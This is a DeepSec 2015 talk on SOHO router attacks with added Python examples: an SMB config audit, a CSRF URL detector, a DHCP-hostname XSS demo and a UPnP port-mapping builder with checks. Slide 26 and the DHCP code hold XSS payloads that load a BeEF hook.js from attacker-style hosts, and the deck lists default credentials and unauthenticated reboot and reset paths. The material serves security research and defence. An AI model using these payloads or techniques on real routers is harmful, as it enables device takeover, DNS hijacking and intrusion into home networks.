
  1. Revisiting SOHO Router Attacks DeepSec 2015

2. About us... Meet our research group
• Álvaro Folgado Rueda, Independent Researcher
• José Antonio Rodríguez García, Independent Researcher
• Iván Sanz de Castro, Security Analyst at Wise Security Global
Revisiting SOHO Router Attacks · DeepSec 2015 2

3. Main goals
• Search for vulnerability issues
• Explore innovative attack vectors
• Evaluate the current security level of routers
• Develop exploiting tools
• Build an audit methodology

4. State of the art
• Previous research

10. State of the art
• Real world attacks

11. Common security problems
• Services
  • Too many. Mostly useless.
  • Increases attack surfaces
  • Insecure

12. Common security problems
• Default credentials
  • Public and well-known for each model
  • Not randomly generated
  • Hardly ever modified by users
[Chart: default user / password pairs and their share of the tested routers: 1234 / 1234, admin / admin, [blank] / admin, admin / password, vodafone / vodafone (shares 45%, 27%, 18%, 5%, 5%)]

13. Common security problems
• Multiple user accounts
  • Also with public default credentials
  • Mostly useless for users
  • Almost always hidden from end-users
  • Passwords for these accounts are never changed

15. Bypass Authentication
• Allows unauthenticated attackers to carry out router configuration changes
• Locally and remotely
• Exploits:
  • Improper file permissions
  • Service misconfiguration

16. Bypass Authentication
• Web configuration interface
  • Permanent Denial of Service: by accessing /rebootinfo.cgi
  • Reset to default configuration settings: by accessing /restoreinfo.cgi
  • Router replies with either HTTP 400 (Bad Request) or HTTP 401 (Unauthorized)
  • But spamming gets the job done!
Video Demo #1: Persistent Denial of Service without requiring authentication

17. Bypass Authentication
• SMB
  • Allows unauthenticated attackers to download the entire router filesystem
  • Including critical files such as /etc/passwd
  • File modification is also possible
  • Erroneous configuration of the wide links feature
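The SMB problem on slide 17 is a Samba configuration issue: with `wide links = yes` the server follows symbolic links that point outside the share, and when the share is also open to guests an unauthenticated client can walk the whole router filesystem. The script below is an added audit example (not the speakers' tool) that parses an smb.conf and reports shares with that combination. The sample configuration is constructed for illustration; Samba disables `wide links` while `unix extensions = yes` (its default), so the check derives the effective value from both options.

```python
"""Audit an smb.conf for the Samba "wide links" misconfiguration.

Added example, not the speakers' tool. "wide links = yes" lets Samba follow
symlinks that point outside the share; with guest access that hands an
unauthenticated client the whole filesystem (/etc/passwd included), and a
writable share allows file modification as well. Samba ignores
"wide links = yes" while "unix extensions = yes" (the default), so the
audit computes the effective value from both options. The configuration
below is constructed for illustration.
"""
import configparser

SAMPLE_SMB_CONF = """
[global]
   workgroup = WORKGROUP
   security = share
   unix extensions = no
   wide links = yes

[usb1]
   path = /mnt/usb1
   guest ok = yes
   writable = yes

[home]
   path = /home
   guest ok = no
   wide links = no
"""

# Samba defaults for the options the audit looks at.
DEFAULTS = {"unix extensions": True, "wide links": False,
            "guest ok": False, "writable": False}


def load_smb_conf(text):
    """Parse smb.conf text; Samba's syntax is close enough to INI for this."""
    cp = configparser.ConfigParser(strict=False, interpolation=None)
    cp.read_string(text)
    return cp


def effective(cp, share, key):
    """Share-level setting, else the [global] setting, else the Samba default."""
    for section in (share, "global"):
        if cp.has_section(section) and cp.has_option(section, key):
            return cp.getboolean(section, key)
    return DEFAULTS[key]


def audit(text):
    """Return one finding per share that exposes symlink traversal."""
    cp = load_smb_conf(text)
    findings = []
    for share in cp.sections():
        if share.lower() == "global":
            continue
        wide_links = (effective(cp, share, "wide links")
                      and not effective(cp, share, "unix extensions"))
        if not wide_links:
            continue
        guest = effective(cp, share, "guest ok")
        writable = effective(cp, share, "writable")
        findings.append({
            "share": share,
            "path": cp.get(share, "path", fallback="?"),
            "unauthenticated": guest,
            "writable": writable,
            "severity": "critical" if guest else "high",
        })
    return findings


if __name__ == "__main__":
    for f in audit(SAMPLE_SMB_CONF):
        who = "unauthenticated (guest)" if f["unauthenticated"] else "authenticated"
        access = "read/write" if f["writable"] else "read"
        print(f"[{f['severity']}] share {f['share']} ({f['path']}): {who} clients "
              f"get {access} access outside the share through symlinks")
```

The fix on the router side is the Samba default, `wide links = no` (or leaving `unix extensions = yes`), together with `guest ok = no` on any share that exposes the root filesystem or a USB disk. The parser treats `writable` only; Samba also accepts `writeable` and the inverse `read only`, which a production audit would normalise as well.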

19. Bypass Authentication
• Twonky Media Server
  • Allows unauthenticated attackers to manipulate the contents of the USB storage device hooked up to the router
  • Download / Modify / Delete / Upload files
  • Misconfiguration of the service

21. Cross Site Request Forgery
• Change any router configuration setting by sending a specific malicious link to the victim
• Main goal: DNS Hijacking
• Requires embedding login credentials in the malicious URL
• Attack feasible if credentials have never been changed
• Google Chrome does not pop up a warning message

24. Cross Site Request Forgery
• Suspicious link, isn't it?
  • URL Shortening Services
  • Create a malicious website
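The CSRF links on slides 21 to 24 have a recognisable shape: credentials embedded in the URL, a private LAN address as the target, and DNS server addresses in the query string. The following added example (not from the talk) scans URLs in that form, the way a proxy log or browser history could be checked after the fact, and ranks the ones that combine a default credential pair from slide 12 with a DNS change highest. The URLs are constructed, and the hint list and severities are this example's own heuristics.

```python
"""Spot CSRF links that carry router credentials in the URL.

Added example, not from the talk. As slide 21 notes, Chrome follows a
http://user:password@host/ link without prompting, so one link can both log
in to a router that still has its default credentials and rewrite its DNS
servers. The URLs below are constructed to look like a proxy log's request
field; the detector flags URLs that embed credentials and ranks those that
target a private address or carry DNS parameters highest. The heuristics
and names are this example's own.
"""
import ipaddress
from urllib.parse import parse_qs, urlsplit

# (user, password) pairs from the default-credentials survey on slide 12.
DEFAULT_CREDS = {("1234", "1234"), ("admin", "admin"), ("", "admin"),
                 ("admin", "password"), ("vodafone", "vodafone")}
# Path or query fragments that usually belong to a configuration change.
CONFIG_HINTS = ("dns", "goform", "setup", "wan", "apply", "config")

SAMPLE_URLS = [          # constructed
    "http://1234:1234@192.168.1.1/goform/dns?dns1=203.0.113.5&dns2=203.0.113.6",
    "http://admin:admin@10.0.0.1/setup.cgi?todo=save&wanDns=198.51.100.1",
    "http://alice:s3cret@intranet.example.com/wiki/page",
    "http://192.168.1.1/",
    "https://www.example.com/search?q=routers",
]


def is_private_host(host):
    try:
        return ipaddress.ip_address(host).is_private
    except ValueError:               # a hostname, not an IP literal
        return False


def analyse(url):
    """Return a finding for a URL with embedded credentials, else None."""
    parts = urlsplit(url)
    if parts.username is None and parts.password is None:
        return None
    creds = (parts.username or "", parts.password or "")
    host = parts.hostname or ""
    query = parse_qs(parts.query)
    dns_params = {k: v for k, v in query.items() if "dns" in k.lower()}
    config_change = any(h in (parts.path + "?" + parts.query).lower()
                        for h in CONFIG_HINTS)
    private = is_private_host(host)
    if private and (creds in DEFAULT_CREDS or dns_params):
        severity = "critical"        # default creds or DNS rewrite on a LAN device
    elif private or config_change:
        severity = "high"
    else:
        severity = "medium"          # credentials in a URL are a problem anyway
    return {"url": url, "host": host, "private_target": private,
            "default_credentials": creds in DEFAULT_CREDS,
            "dns_params": dns_params, "severity": severity}


def scan(urls):
    return [f for f in map(analyse, urls) if f is not None]


if __name__ == "__main__":
    for f in scan(SAMPLE_URLS):
        print(f"[{f['severity']}] {f['url']}")
        if f["dns_params"]:
            print("    DNS servers pushed:", f["dns_params"])
```

Shortened links (slide 24) hide the pattern until they are expanded, so the scan has to run on the final URL after redirects. On the router side the cure is not a browser setting but a CSRF token on every state-changing request and a rejection of credentials passed through the URL.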

25. Persistent Cross Site Scripting
• Inject malicious script code within the web configuration interface
• Goals
  • Session Hijacking
  • Browser Infection

26. Persistent Cross Site Scripting
• Browser Exploitation Framework (BeEF) is a great help
• Input field character length limitation
• BeEF hooks link to a more complex script file hosted by the attacker
http://1234:1234@192.168.1.1/goform?param=<script src="http://NoIPDomain:3000/hook.js"></script>

27. Unauthenticated Cross Site Scripting
• Script code injection is performed locally without requiring any login process
• Send a DHCP Request PDU containing the malicious script within the hostname parameter
• The malicious script is injected within the Connected Clients (DHCP Leases) table

28. Unauthenticated Cross Site Scripting

29. Unauthenticated Cross Site Scripting
• Sometimes it is a little bit harder...

31. Unauthenticated Cross Site Scripting
• Or even next level...
• But it works!
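The injection on slides 27 to 31 needs no router login because the hostname in a DHCP Request (option 12) is attacker-controlled data that the web UI later prints into its leases table. The example below is added here (it is not the talk's code) and serves slide 26 as well: it builds such a DHCP Request with the standard library, parses the options the way a DHCP server would, and renders the leases table twice, once the way the affected firmware does and once with output encoding. The MAC address, IP addresses and the hook URL are placeholders; the payload is kept to a short loader because option 12 has a one-byte length field, the same constraint that makes a BeEF hook link the practical choice on slide 26.

```python
"""DHCP hostname injection into a router's "connected clients" table.

Added example, not code from the talk. A DHCP Request carries the client's
hostname in option 12; a web UI that prints that string into its DHCP leases
table without encoding it runs the payload in the administrator's browser,
with no router login at all. The packet is built and parsed with the standard
library; the two renderers contrast the vulnerable page with the fixed one.
The MAC, addresses and the hook URL are placeholders.
"""
import html
import struct

DHCPREQUEST = 3
MAGIC_COOKIE = b"\x63\x82\x53\x63"
# Hook-style payload as on slide 26. Option 12 has a one-byte length field,
# so the payload must stay under 256 bytes: keep it a loader, not the script.
PAYLOAD = '<script src="http://attacker.example:3000/hook.js"></script>'


def build_dhcp_request(mac, hostname, xid=0x12345678):
    """Minimal BOOTP/DHCP Request carrying option 12 (host name)."""
    hostname_b = hostname.encode()
    if len(hostname_b) > 255:
        raise ValueError("option 12 is limited to 255 bytes")
    header = struct.pack(
        "!BBBBIHH4s4s4s4s16s64s128s",
        1, 1, 6, 0,                  # op=BOOTREQUEST, htype=Ethernet, hlen, hops
        xid, 0, 0x8000,              # xid, secs, flags (broadcast bit)
        b"\0" * 4, b"\0" * 4, b"\0" * 4, b"\0" * 4,   # ciaddr yiaddr siaddr giaddr
        mac, b"\0" * 64, b"\0" * 128)                 # chaddr (null-padded), sname, file
    options = (bytes([53, 1, DHCPREQUEST])
               + bytes([12, len(hostname_b)]) + hostname_b
               + b"\xff")
    return header + MAGIC_COOKIE + options


def parse_dhcp_options(packet):
    """Decode the options field into {code: raw bytes}, as a DHCP server would."""
    if packet[236:240] != MAGIC_COOKIE:
        raise ValueError("not a DHCP packet")
    body, opts, i = packet[240:], {}, 0
    while i < len(body):
        code = body[i]
        if code == 255:              # end marker
            break
        if code == 0:                # pad byte
            i += 1
            continue
        length = body[i + 1]
        opts[code] = body[i + 2:i + 2 + length]
        i += 2 + length
    return opts


def hostname_from_packet(packet):
    return parse_dhcp_options(packet).get(12, b"").decode("utf-8", "replace")


def render_leases_vulnerable(leases):
    """What the affected firmware does: the hostname lands in the HTML verbatim."""
    rows = "".join(f"<tr><td>{ip}</td><td>{mac}</td><td>{name}</td></tr>"
                   for ip, mac, name in leases)
    return f"<table>{rows}</table>"


def render_leases_fixed(leases):
    """Same table with every client-supplied field HTML-escaped on output."""
    rows = "".join(
        "<tr>" + "".join(f"<td>{html.escape(str(v))}</td>" for v in row) + "</tr>"
        for row in leases)
    return f"<table>{rows}</table>"


def demo():
    """A client sends the payload as its hostname; return both renderings."""
    mac = bytes.fromhex("0200deadbeef")          # locally administered placeholder
    packet = build_dhcp_request(mac, PAYLOAD)
    lease = [("192.168.1.23", "02:00:de:ad:be:ef", hostname_from_packet(packet))]
    return render_leases_vulnerable(lease), render_leases_fixed(lease)


if __name__ == "__main__":
    vulnerable, fixed = demo()
    print("vulnerable:", vulnerable)
    print("fixed:     ", fixed)
```

Escaping on output is the fix that survives the "harder" cases on slides 29 to 31: whatever filtering the firmware applies to the hostname on the way in, a table cell that encodes `<`, `>`, `&` and quotes cannot start a script context. A stricter server would additionally refuse hostnames outside the DNS label alphabet when storing the lease.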

32. Privilege Escalation
• A user without administrator rights is able to escalate privileges and become an administrator
• Shows why multiple user accounts are unsafe
Video Demo #2: Privilege Escalation via FTP

33. Backdoor
• Hidden administrator accounts
  • Completely invisible to end users
  • But allow attackers to change any configuration setting

35. Information Disclosure
• Obtain critical information without requiring any login process
  • WLAN password
  • Detailed list of currently connected clients
  • Hints about the router's administrative password
  • Other critical configuration settings

37. Information Disclosure

40. Universal Plug and Play
• Enabled by default on several router models
• Allows applications to execute network configuration changes such as opening ports
• Extremely insecure protocol
  • Lack of an authentication process
  • Awful implementations
• Goals
  • Open critical ports for remote WAN hosts
  • Persistent Denial of Service
  • Carry out other configuration changes

41. Universal Plug and Play
• Locally
  • Miranda UPnP tool

42. Universal Plug and Play

44. Universal Plug and Play
• Remotely
  • Malicious SWF file
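The port-opening attack on slides 40 to 44 is a single unauthenticated SOAP call, `AddPortMapping` on the IGD's WANIPConnection service, whether it comes from Miranda on the LAN or from a malicious SWF on a web page. The example below is added here (it is not the talk's code) and shows both halves: the request body such a tool sends, and the checks a router should apply before honouring it, which the affected devices did not. The SOAP envelope follows the UPnP WANIPConnection:1 action format; the router address, LAN range, requester and policy are constructed for illustration.

```python
"""UPnP IGD AddPortMapping: the request a tool such as Miranda (or a malicious
SWF) sends, and the checks a router should apply before honouring it.

Added example, not the talk's code. The SOAP envelope follows the UPnP
WANIPConnection:1 service description; the addresses, the requester and the
policy are constructed for illustration and not taken from any real device.
"""
import ipaddress
import xml.etree.ElementTree as ET

SERVICE = "urn:schemas-upnp-org:service:WANIPConnection:1"
SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"
ROUTER_LAN_IP = "192.168.1.1"                     # placeholder
LAN = ipaddress.ip_network("192.168.1.0/24")      # placeholder


def build_add_port_mapping(internal_client, internal_port, external_port,
                           protocol="TCP", remote_host="", lease=0,
                           description="added example"):
    """HTTP POST body for AddPortMapping (sent with SOAPAction "SERVICE#AddPortMapping")."""
    args = [("NewRemoteHost", remote_host), ("NewExternalPort", external_port),
            ("NewProtocol", protocol), ("NewInternalPort", internal_port),
            ("NewInternalClient", internal_client), ("NewEnabled", 1),
            ("NewPortMappingDescription", description), ("NewLeaseDuration", lease)]
    body = "".join(f"<{k}>{v}</{k}>" for k, v in args)
    return ('<?xml version="1.0"?>'
            f'<s:Envelope xmlns:s="{SOAP_NS}" '
            's:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">'
            f'<s:Body><u:AddPortMapping xmlns:u="{SERVICE}">{body}'
            '</u:AddPortMapping></s:Body></s:Envelope>')


def parse_add_port_mapping(xml_text):
    """Extract the action arguments the way the router's SOAP handler would."""
    root = ET.fromstring(xml_text)
    action = root.find(f"{{{SOAP_NS}}}Body/{{{SERVICE}}}AddPortMapping")
    if action is None:
        raise ValueError("not an AddPortMapping request")
    return {child.tag: (child.text or "") for child in action}


def check_mapping(mapping, requester_ip, from_wan=False):
    """Return the reasons a router should refuse this mapping (empty = accept).

    The affected routers apply none of these: there is no authentication, so
    any LAN process (or, with UPnP reachable from the WAN, anyone) opens ports.
    """
    problems = []
    if from_wan:
        problems.append("request received on the WAN interface")
    client = mapping.get("NewInternalClient", "")
    try:
        client_ip = ipaddress.ip_address(client)
    except ValueError:
        return problems + [f"NewInternalClient {client!r} is not an IP address"]
    if client_ip.is_loopback or client == ROUTER_LAN_IP:
        problems.append("mapping targets the router itself (exposes its own services to the WAN)")
    elif client_ip not in LAN:
        problems.append("NewInternalClient is outside the LAN")
    elif client != requester_ip:
        problems.append("mapping is for a host other than the requester")
    if mapping.get("NewLeaseDuration", "0") == "0":
        problems.append("lease duration 0: the mapping never expires")
    return problems


def demo():
    """A LAN host asks to expose the router's own web UI on WAN port 8080."""
    request = build_add_port_mapping(ROUTER_LAN_IP, 80, 8080)
    return check_mapping(parse_add_port_mapping(request), requester_ip="192.168.1.23")


if __name__ == "__main__":
    for problem in demo():
        print("refuse:", problem)
```

The same request body, POSTed to the control URL advertised in the device description, is what a Flash-based page on slide 44 delivers from the victim's browser, which is why the `from_wan` check alone is not enough: the request arrives from a LAN address. Binding the internal client to the requester and refusing mappings to the router's own addresses closes the case shown in `demo()`, where a mapping to the router's web interface would put the admin UI on the Internet.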
